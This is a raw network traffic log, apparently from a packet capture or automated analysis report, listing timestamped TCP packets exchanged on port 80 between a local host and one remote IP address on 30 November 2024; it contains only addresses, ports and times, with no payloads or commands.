Nov 30, 2024 04:06:20.539515018 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.539560080 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.540352106 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.540395975 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.540447950 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.540493011 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.541251898 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.541301966 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.541352987 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.541404009 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.542167902 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.542212963 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.542304039 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.542351007 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.543065071 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.543116093 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.543168068 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.543214083 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.543926001 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.543971062 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.706764936 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.706800938 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.706825018 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.706857920 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.707273960 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.707331896 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.707391977 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.707447052 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.708123922 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.708180904 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.708239079 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.708288908 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.709009886 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.709070921 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.709152937 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.709203959 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.709965944 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.710014105 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.710048914 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.710098982 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.710869074 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.710918903 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.710967064 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.711009026 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.711803913 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.711815119 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.711858988 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.712645054 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.712696075 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.712768078 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.712816954 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.713548899 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.713619947 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.713655949 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.713704109 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.714492083 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.714540005 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.714616060 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.714664936 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.715362072 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.715409040 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.715466022 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.715512991 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.716274023 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.716320038 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.716399908 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.716447115 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.717236996 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.717286110 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.717319965 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.717367887 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.718116045 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.718168020 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.718208075 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.718257904 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.719008923 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.719055891 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.719139099 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.719186068 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.719937086 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.719983101 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.720213890 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.720258951 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.720873117 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.720940113 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.720942020 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.720980883 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.721740961 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.721790075 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.721951962 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.721997976 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.722665071 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.722712040 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.722774982 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.722820997 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.723581076 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.723627090 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.723654985 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.723700047 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.724514008 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.724560022 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.724678993 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.724728107 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.725389957 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.725436926 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.725487947 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.725533962 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.726250887 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.726299047 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.726396084 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.726444960 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.727366924 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.727376938 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.727426052 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.728209019 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.728218079 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.728256941 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.728308916 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.729017973 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.729070902 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.729168892 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.729217052 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.729928017 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.729976892 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.730051994 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.730097055 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.730828047 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.730876923 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.730927944 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.730973005 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.731733084 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.731777906 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.731852055 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.731904984 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.732683897 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.732732058 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.732765913 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.732815027 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.733562946 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.733611107 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.733670950 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.733721018 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.734486103 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.734534025 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.734574080 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.734622955 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.735383987 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.735430956 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.735440016 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.735496998 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.736263037 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.736313105 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.736442089 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.736486912 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.737191916 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.737241030 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.737303972 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.737349987 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.738087893 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.738137960 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.738276958 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.738322973 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.739023924 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.739075899 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.739077091 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.739123106 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.739938021 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.739986897 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.740022898 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.740072966 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.740838051 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.740888119 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.740950108 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.740998030 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.741729021 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.741777897 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.741832018 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.741878986 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.742747068 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.742791891 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.742795944 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.742847919 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.743552923 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.743603945 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.743664980 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.743714094 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.744494915 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.744544983 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.744657040 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.744710922 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.745387077 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.745438099 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.745482922 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.745532990 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.746289968 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.746340036 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.746388912 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.746437073 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.747203112 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.747251987 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.747344971 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.747391939 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.748125076 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.748172045 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.748256922 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.748303890 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.749089956 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.749135017 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.749167919 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.749217987 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.749919891 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.749969006 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.750076056 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.750133038 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.750823975 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.750884056 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.750947952 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.750997066 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.751823902 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.751836061 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.751879930 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.752645016 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.752695084 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.752768993 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.752823114 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.753576994 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.753627062 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.753643990 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.753694057 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.754384041 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.754427910 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.917265892 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.917324066 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.917366028 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.917406082 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.917704105 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.917758942 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.917768002 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.917817116 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.918637991 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.918689013 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.918706894 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.918744087 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.919527054 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.919578075 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.919615030 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.919658899 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.920418978 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.920469046 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.920485973 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.920521975 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.921345949 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.921399117 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.921431065 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.921477079 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.922250032 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.922300100 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.922414064 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.922463894 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.923201084 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.923243999 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.923252106 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.923316956 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.924120903 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.924169064 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.924232960 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.924280882 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.925026894 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.925075054 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.925102949 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.925151110 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.925879955 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.925931931 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.925992966 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.926040888 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.926784992 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.926836967 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.926883936 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.926934004 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.927722931 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.927783012 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.927813053 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.927859068 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.928630114 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.928688049 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.928719044 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.928772926 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.929609060 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.929620028 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.929667950 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.930457115 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.930506945 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.930529118 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.930578947 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.931339979 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.931391954 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.931507111 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.931551933 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.932257891 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.932306051 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.932358027 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.932406902 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.933135986 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.933181047 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.933260918 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.933306932 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.934035063 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.934082031 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.934144020 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.934192896 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.934971094 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.935022116 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.935084105 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.935134888 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.935969114 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.935980082 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.936018944 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.936806917 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.936863899 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.936894894 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.936943054 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.937683105 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.937747955 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.937788963 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.937838078 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.938580990 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.938628912 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.938749075 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.938802958 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.939496994 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.939554930 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.939598083 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.939656019 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.940413952 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.940466881 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.940604925 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.940659046 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.941318035 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.941399097 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.941431046 CET	80	49782	185.215.113.16	192.168.2.4
